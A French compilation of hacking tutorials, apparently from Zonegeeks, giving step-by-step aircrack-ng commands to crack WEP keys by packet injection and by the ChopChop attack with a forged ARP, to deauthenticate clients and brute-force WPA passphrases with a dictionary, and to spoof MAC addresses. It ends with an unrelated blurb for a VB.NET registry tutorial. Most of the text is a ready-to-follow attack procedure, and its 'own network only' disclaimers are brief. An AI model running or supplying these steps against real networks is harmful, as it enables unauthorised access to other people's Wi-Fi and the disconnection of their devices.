You are on page 1of 24

Avant de se lancer dans la sécurité réseau :

• Il faut avoir quelques connaissances en informatique.


• Posséder un Live-CD de Linux (téléchargeable ici).
• Etre patient !

Il est formellement interdit de s'introduire dans un réseau sans en avoir eu l'autorisation du


propriétaire.

Ce tutoriel a pour unique but de sensibiliser les gens au piratage. Le piratage est un fait grave.
Des peines et amendes pourraient être encourues aux petits malins qui utiliseraient ce tutoriel
à des fins malhonnêtes.

Toutefois vous avez parfaitement le droit de tester la sécurité de votre réseau et uniquement
votre réseau ! Zonegeeks décline toutes responsabilités.

L'attaque par injection de packets a pour but de stimuler la production d'ivs nécessaire au
craquage de votre clé wep. Cette attaque est très efficace lorsqu'une station connectée génère
des arp.

Une station connectée (et valide) est pré requis pour tenter l'attaque. Cependant l'attaque sans
station est possible mais le taux de réussite est relativement faible.

Voir également :

• Crack clé wep par l'attaque Chopchop


• Crack clé wpa par Brute Force

Pour commencer, il faut posséder un Live-CD (CD Bootable) de Linux. Vous pouvez
télécharger Backtrack 2 (dernière version) sur ce site.

Vous devez ensuite insérer le CD dans le lecteur de manière à booter sur le CD (vous devez
peut-être changer la séquence de boot dans le BIOS).

Attendez ensuite quelques minutes et vous devriez voir cet écran de démarrage :

Login : root
Pass : toor

Une fois logué, entrer la commande startx (attention clavier qzerty donc il faut écrire stqrtx).
Une fois le bureau chargé, changer la langue en cliquant sur l'icône en bas à droite du bureau.

Ouvrez une console (icône en bas à gauche de couleur noire) et c'est parti !

Lancez airmon-ng :
airmon-ng start INTERFACE_WIFI
Pour connaitre son interface wifi, faites seulement airmon-ng.

Lancez airodump-ng :

airodump-ng --write Nom_Fichier_Sortie --channel Canal --encrypt Type_De_Securite


INTERFACE_WIFI

-- write : Nom du fichier cap de sortie. Obligatoire


-- channel : Cannal où se situe l'ap (entre 1 et 13). Facultatif.
-- encrypt : Filtre en fonction de la sécutité du réseau (wpa, wep, opn). Faculatatif.
-- bssid : Filtre en fonction d'une adresse MAC d'un réseau. Facultatif.

L'ap visé s'appelle test_wep.

Passons maintenant à la fake authentification.


aireplay-ng -1 0 -e Nom_Du_Reseau -a Bssid_Du_Reseau -h Bssid_De_La_Station
INTERFACE WIFI

-1 0 : Indique une fake authentification avec un timeout de 0ms. Obligatoire.


-e : Nom du réseau (colonne ESSID). Obligatoire.
-a : Adresse MAC du réseau (colonne BSSID). Obligatoire.
-h : Adresse MAC de la station (colonne STATION). Obligatoire.

Une fois l'association réussie, on passe à l'injection de packets.

aireplay -3 -e Nom_Du_Reseau -b Bssid_Du_Reseau -h Bssid_De_La_Station -x


Vitesse_Injection -r Fichier_Cap_A_Utiliser INTERFACE_WIFI

-3 : Indique qu'il s'agit d'une injection de packets. Obligatoire.


-e : Nom du réseau. Facultatif.
-b : Adresse MAC du réseau (colonne BSSID). Obligatoire.
-h : Adresse MAC de la station (colonne STATION). Obligatoire.
-x : Vitesse d'injection des packets (entre 100 et 1000). Facultatif.
-r : Fichier cap à se servir pour l'injection lors de l'attaque ChopChop par exemple. Facultatif.

Il faut attendre quelques minutes pour que les arp augmentent ainsi que les ivs mais si vous
êtes loin de l'ap, cela peut prendre plusieurs heures.

Normalement si tout se passe bien, les arp augmentent ainsi que les ivs.
Il faut en théorie 300 000 ivs pour cracker une clé de 64 bits, 1 000 000 pour une clé de 128
bits et 3 000 000 pour une clé de 256 bits.
Lancez aircrack-ng :

aircrack-ng -x -0 -n Taille_Cle_Wep Nom_Du_Fichier_Cap_De_Aerodump

-x : Attaque classique pour casser la clé. Obligatoire


-0 : Colorie l'ecran en vert à la matrix ! Facultatif.
-n : Si vous connaissez la taille de la clé wep (64, 128 ou 256). Facultatif.
-f : Fudge factor (entre 2 et 12). Facultatif.
-k : Désactive certaines attaques de Korek (entre 1 et 17). Facultatif.
*.cap : Charge tous les fichiers cap (pratique si vous avez oublier le nom du fichier).
Obligatoire.

Admirez les chiffres hexadécimaux qui défilent à la matrix ! Vous devriez voir votre clé wep
au bout de quelques minutes si vous avez suffisamment d'ivs...
Cependant, un nouvel algorithme a vu le jour il y a quelques mois. Il s'agit de aircrack-ptw
disponible en natif seulement avec les distributions Backtrack 2.0 et Wifiway 0.6

Une mise à jour de aircrack-ng permet d'avoir ce nouvel algorithme redoutable. (voir
comment installer la mise à jour).

La syntaxe est quasi identique :

aircrack-ng -z -0 -n Taille_Cle_Wep Nom_Du_Fichier_Cap_De_Aerodump

-z : Nouvel algorithme de crackage (ptw). Obligatoire


-0 : Colorie l'ecran en vert à la matrix ! Facultatif.
-n : Si vous connaissez la taille de la clé wep (64, 128 ou 256). Facultatif.
-f : Fudge factor (entre 2 et 12). Facultatif.
-k : Désactive certaines attaques de Korek (entre 1 et 17). Facultatif.
*.cap : Charge tous les fichiers cap (pratique si vous avez oublier le nom du fichier).
Obligatoire.
On remplace le « x » par « z ».

Avec cet algorithme, on peut cracker une clé wep avec seulement 40 000 ivs. La preuve en
image :

En cas d'échec, vous pouvez modifier le fudge factor (-f) entre 2 et 10.
Vous pouvez aussi désactiver un des attaques de KOREK (-k). Par défaut, aircrack utilise 17
attaques !

Et si vous le souhaitez, vous pouvez fusionner les commandes :

Si cela ne marche toujours pas,

• Le fichier de capture (.cap) est corrompu.


• Vous n'avez pas assez d'ivs.
• Le réseau a changé de nom, clé wep ou adressage.
• Vous êtes poissard !

Avant de se lancer dans la sécurité réseau :

• Il faut avoir quelques connaissances en informatique.


• Posséder un Live-CD de Linux (téléchargeable ici).
• Etre patient !

Il est formellement interdit de s'introduire dans un réseau sans en avoir eu l'autorisation du


propriétaire.

Ce tutoriel a pour unique but de sensibiliser les gens au piratage. Le piratage est un fait grave.
Des peines et amendes pourraient être encourues aux petits malins qui utiliseraient ce tutoriel
à des fins malhonnêtes.

Toutefois vous avez parfaitement le droit de tester la sécurité de votre réseau et uniquement
votre réseau ! Zonegeeks décline toutes responsabilités.

L'attaque ChopChop a pour but d'injecter un faux arp afin de stimuler la production des ivs
nécessaire au craquage de votre clé wep. Cette attaque est très efficace lorsqu'une station
connectée ne génère pas d'arp.

Comme d'habitude, seule une station connectée (et valide) est pré requis pour tenter l'attaque.
Voir également :

• Crack clé wep par injection de paquets


• Crack clé wpa par Brute Force

Pour commencer, il faut posséder un Live-CD (CD Bootable) de Linux. Vous pouvez
télécharger Backtrack 2 (dernière version) sur ce site.

Vous devez ensuite insérer le CD dans le lecteur de manière à booter sur le CD (vous devez
peut-être changer la séquence de boot dans le BIOS).

Attendez ensuite quelques minutes et vous devriez voir cet écran de démarrage :

Login : root
Pass : toor

Une fois logué, entrer la commande startx (attention clavier qzerty donc il faut écrire stqrtx).

Une fois le bureau chargé, changer la langue en cliquant sur l'icône en bas à droite du bureau.
Ouvrez une console (icône en bas à gauche de couleur noire) et c'est parti !

Lancez airmon-ng :

airmon-ng start INTERFACE_WIFI


Pour connaitre son interface wifi, faites seulement airmon-ng.
Lancez airodump-ng :

airodump-ng --write Nom_Fichier_Sortie --channel Canal --encrypt Type_De_Securite


INTERFACE_WIFI

-- write : Nom du fichier cap de sortie. Obligatoire


-- channel : Cannal où se situe l'ap (entre 1 et 13). Facultatif.
-- encrypt : Filtre en fonction de la sécutité du réseau (wpa, wep, opn). Faculatatif.
-- bssid : Filtre en fonction d'une adresse MAC d'un réseau. Facultatif.

L'ap visé s'appelle test_wep.

Passons maintenant à la fake authentification.

aireplay-ng -1 30 -e Nom_Du_Reseau -a Bssid_Du_Reseau -h Bssid_De_La_Station


INTERFACE WIFI

-1 30 : Indique une fake authentification avec un timeout de 30ms. Obligatoire.


-e : Nom du réseau (colonne ESSID). Obligatoire.
-a : Adresse MAC du réseau (colonne BSSID). Obligatoire.
-h : Adresse MAC de la station (colonne STATION). Obligatoire.
La syntaxe diffère très peu de celle pour l'attaque classique. Nous allons juste rajouter un
timeout de 30 millisecondes au lieu de 0.

Vous allez apercevoir cette fois un message « Keep-Alive packet ». Dès que ce message est
visible, vous pouvez continuer l'attaque.

Utilisons l'attaque ChopChop (-4) au lieu de l'attaque par injection de packet (-3).

aireplay-ng -4 -b Adresse_Mac_Reseau -h Adresse_Mac_Station INTERFACE_WIFI

-4 : Indique que l'on utilise l'attaque ChopChop. Obligatoire.


-b : Adresse MAC du réseau (colonne BSSID). Obligatoire.
-h : Adresse MAC de la station (colonne STATION). Obligatoire.

Lorsque l'attaque est lancée, le programme "read" des packets. Dès qu'il trouve une trame
intéressante, vous apercevez des trucs bizarres (voir screen).
Le programme vous demande si vous souhaitez utiliser cette trame. Répondez naturellement
par « y »(Yes).

Un fichier xor se construit. Cela peut prendre plusieurs minutes si vous êtes loin de l'ap.
Aireplay-ng va créer deux fichiers (un fichier xor et un fichier cap) portant le même nom mais
pas la même extension. Notez bien le nom de ces fichiers. Ils vous seront utiles pour la suite.

Maintenant il faut trouver l'adressage du réseau. Cela ne devrait pas être difficile puisque vous
êtes le propriétaire !

Je vous donne quand même la commande pour trouver l'adressage du réseau.

tcpdump -s 0 -n -e -r Fichier_Cap_Creer_Avant

Le fichier cap que vous devez indiquer est celui crée au préalable par l'attaque ChopChop.

Seule l'ip source (station) est visible. Il faut deviner l'ip de destination (le plus souvent c'est
192.168.0.1 ou 192.168.1.1 voire 192.168.0.254 pour les Freebox)

Dans notre cas, on a : 192.168.0.3 (source) et 192.168.0.254 (destination).

Maintenant on va créer notre faux arp que l'on va injecter par la suite. Pour cela, on va utiliser
packetforge-ng dont la syntaxe est un peu plus longue.

packetforge-ng -0 -a Adresse_Mac_Reseau -h Adresse_Mac_Station -k Ip_Source -l


Ip_Destination -y Fichier_Xor_Creer_Avant -w Nom_Fichier_Sortie
-0 : Indique que nous voulons un packet de type arp. Obligatoire.
-a : Adresse MAC du réseau (colonne BSSID). Obligatoire.
-h : Adresse MAC de la station (colonne STATION). Obligatoire.
-k : Ip source trouvée avec tcpdump. Obligatoire.
-l : Ip de destination trouvée avec tcpdump. Obligatoire.
-y : Fichier xor créer auparavant avec l'attaque ChopChop. Obligatoire.
-w : Nom du fichier de sortie c'est à dire le nom du fichier créé. Obligatoire.

Voilà nous y sommes presque ! Voici la syntaxe de l'injection de packets.

aireplay -3 -e Nom_Du_Reseau -b Bssid_Du_Reseau -h Bssid_De_La_Station -x


Vitesse_Injection -r Fichier_Cap_A_Utiliser INTERFACE_WIFI

-3 : Indique qu'il s'agit d'une injection de packets. Obligatoire.


-e : Nom du réseau. Facultatif.
-b : Adresse MAC du réseau (colonne BSSID). Obligatoire.
-h : Adresse MAC de la station (colonne STATION). Obligatoire.
-x : Vitesse d'injection des packets (entre 100 et 1000). Facultatif.
-r : Fichier cap créé précédemment avec packetforge. Obligatoire.

Normalement si tout se passe bien, les arp augmentent ainsi que les ivs.

La suite est similaire à l'attaque par injection de packets.

Après ce tutoriel, je vous conseille vivement de passer au WPA ...

Avant de se lancer dans la sécurité réseau :

• Il faut avoir quelques connaissances en informatique.


• Posséder un Live-CD de Linux (téléchargeable ici).
• Etre patient !

Il est formellement interdit de s'introduire dans un réseau sans en avoir eu l'autorisation du


propriétaire.
Ce tutoriel a pour unique but de sensibiliser les gens au piratage. Le piratage est un fait grave.
Des peines et amendes pourraient être encourues aux petits malins qui utiliseraient ce tutoriel
à des fins malhonnêtes.

Toutefois vous avez parfaitement le droit de tester la sécurité de votre réseau et uniquement
votre réseau ! Zonegeeks décline toutes responsabilités.

Une station connectée (et valide) est pré requis pour tenter l'attaque.

Voir également :

• Crack clé wep par l'attaque Chopchop


• Crack clé wep par injection de paquets

Pour commencer, il faut posséder un Live-CD (CD Bootable) de Linux. Vous pouvez
télécharger Backtrack 2 (dernière version) sur ce site.

Vous devez ensuite insérer le CD dans le lecteur de manière à booter sur le CD (vous devez
peut-être changer la séquence de boot dans le BIOS).

Attendez ensuite quelques minutes et vous devriez voir cet écran de démarrage :

Login : root
Pass : toor

Une fois logué, entrer la commande startx (attention clavier qzerty donc il faut écrire stqrtx).
Une fois le bureau chargé, changer la langue en cliquant sur l'icône en bas à droite du bureau.

Ouvrez une console (icône en bas à gauche de couleur noire) et c'est parti !

Lancez airmon-ng :
airmon-ng start INTERFACE_WIFI
Pour connaitre son interface wifi, faites seulement airmon-ng.

Lancez airodump-ng :

airodump-ng --write Nom_Fichier_Sortie --channel Canal --encrypt Type_De_Securite


INTERFACE_WIFI

-- write : Nom du fichier cap de sortie. Obligatoire


-- channel : Cannal où se situe l'ap (entre 1 et 13). Facultatif.
-- encrypt : Filtre en fonction de la sécutité du réseau (wpa, wep, opn). Faculatatif.
-- bssid : Filtre en fonction d'une adresse MAC d'un réseau. Facultatif.

L'ap visé s'appelle test_wpa.

Passons maintenant à la nouveauté par rapport au crack de clé wep. Avec aireplay-ng, il ne
s'agit plus de faire une fake authentification mais une désauthentification des stations
connectées. Le but est d'obtenir un Handshake (il en faut un pour pouvoir lancer le dico).

aireplay-ng -0 1 -a Bssid_Du_Reseau -c Bssid_De_La_Station INTERFACE_WIFI

-0 : Indique qu'il s'agit d'une désauthentification. Obligatoire.


1 : Nombre de désauthentification (0 pour illimité). Obligatoire.
-a : Adresse MAC du réseau (colonne BSSID). Obligatoire.
-c : Adresse MAC de la station (colonne STATION). Facultatif mais recommandé.

La présence d'une station connectée et valide est OBLIGATOIRE pour cette attaque.

Après la désauthentification, attendez un instant le temps que le client se reconnecte. Vous


devriez avoir récupéré un Handshake. Pour le vérifier, il suffit de lancer aircrack comme sur
l'image :

Une fois le Handshake récupéré, on peut passer à la suite.


Maintenant il va falloir charger le dico qui va contenir les passphrases. Télécharger le dico du
tutos. Mettez le sur une clé USB puis branchez la à votre PC. Backtrack détecte
automatiquement votre clé.

Cliquez sur Open in New Windows et glissez votre dico dans le bureau de Backtrack (comme
sous Windows ou alors faites copier/coller).
Maintenant on va décompresser le dico avec la commande zcat. Il faut se trouver dans le
même répertoire que le dico. Faites donc :

cd Desktop

Puis,

zcat Nom_Dico_Compressé.gz | egrep -v '^#' > Nom_Dico_Décompressé

Pour faire le signe ">", mettez le clavier en US puis faites Shift + >

Il ne nous reste plus qu'a lancer aircrack-ng. Il faut cependant revenir dans le répertoire
d'origine. Faites :
cd

Puis,

aircrack-ng -w Chemin_Du_Dico -0 *.cap

-w : Indique le path du dico lors d'une attaque wpa. Obligatoire.


-0 : Colorie l'écran en vert à la Matrix. Facultatif.
*.cap : Charge tous les fichiers cap (pratique si vous avez oublier le nom du fichier).
Obligatoire.

Aircrack-ng se charge du reste. Je vous conseille d'aller prendre un café car le crackage peut
durer des heures comme des jours...

Lorsque Aircrack-ng a trouvé la passphrase, il vous l'indique comme dans l'image ci-dessous.
Au vu de ces images, on pourrait croire qu'aucune protection n'est efficace pour sécuriser un
réseau Wifi. Détrompez-vous, le WPA est le meilleur cryptage et le plus fiable de nos jours
bien qu'il possède des failles.

Le crack d'une clé WPA se fait par Attaque par dictionnaire , c'est-à-dire que le programme
va tester toutes les clés à partir d'un dictionnaire. Dites-vous bien qu'il est IMPOSSIBLE de
cracker une clé WPA difficile comme : Jesuisunamateurdeprogrammation. Je vous encourage
donc à mettre une passphrase difficile (une phrase banale sans espace fera l'affaire).

Vous aurez parfois besoin de changer l'adresse MAC de votre carte wifi. Suivez les
intructions suivantes pour effectuer l'opération.

• Sous linux, rien de plus simple :

Il faut arrêter le périphérique Wifi :

ifconfig INTERFACE_WIFI down

Et puis,

ifconfig INTERFACE_WIFI hw ether NOUVELLE_ADRESSE_MAC

• Sous Windows, c'est tout aussi simple :

Allez dans gestionnaire de périphérique (clique droit sur Poste de Travail puis
Propriétés), puis allez dans les propriétés de votre carte réseau (clique droit sur votre
carte réseau). Dans l'onglet Avancé, trouvez la catégorie Adresse mac ou dans le
même genre. Choisissez Administrer localement et mettez la valeur d'adresse mac que
vous voulez.

Encore une fois la manipulation est très simple (deux commandes pour changer son adresse
MAC sous Linux, c'est presque plus simple que sous Windows !).

La base de registre, que l'on nomme aussi le registre ou la BDR, est très souvent sollicitée par
l'utilisateur soucieux d'optimiser son système, de le personnaliser mais aussi de le réparer. En
effet, le registre est le cerveau de Windows : c'est ici que toutes les informations sont
stockées. Mais est-il possible de modifier le registre par la programmation ? Bien sûr que oui !
Voici un tutoriel que vous le prouve.

Attention : Le registre doit être manipulé avec précaution. Certaines modifications pourraient
entraîner une détérioration de votre système d'exploitation ! Je ne suis donc en aucun cas
responsable d'une mauvaise utilisation de ce tutoriel.

Notions abordées dans la source :

• Utilisation du registre de Windows (lecture et ecriture)


• Utilisation d'une ListView et ComboBox

Niveau de la source : Débutant *


Intensité des commentaires : Très commenté *
Connaissances requises pour comprendre la source : Manipulation d'une ComboBox et
d'une ListView. *

Télécharger la source. (codé avec VB.NET 2.0)

Vous avez la version 2003 de Visual Basic .NET ? Dans ce cas-là, créez un nouveau projet
puis créez autant de Form (Formulaires Windows) qu'il n'y en a dans la source. Ensuite,
copiez le code de chaque Form de la source dans une des Form créées dans votre projet. Si la
source possède des classes et/ou modules, copiez les tout simplement. Votre projet sera
fonctionnel sous Visual Studio 2003.

Il se peut qu'il y ait quelques erreurs dans le code à cause des différentes versions de Visual
Studio. Je vous invite donc à regarder la documentation de MSDN.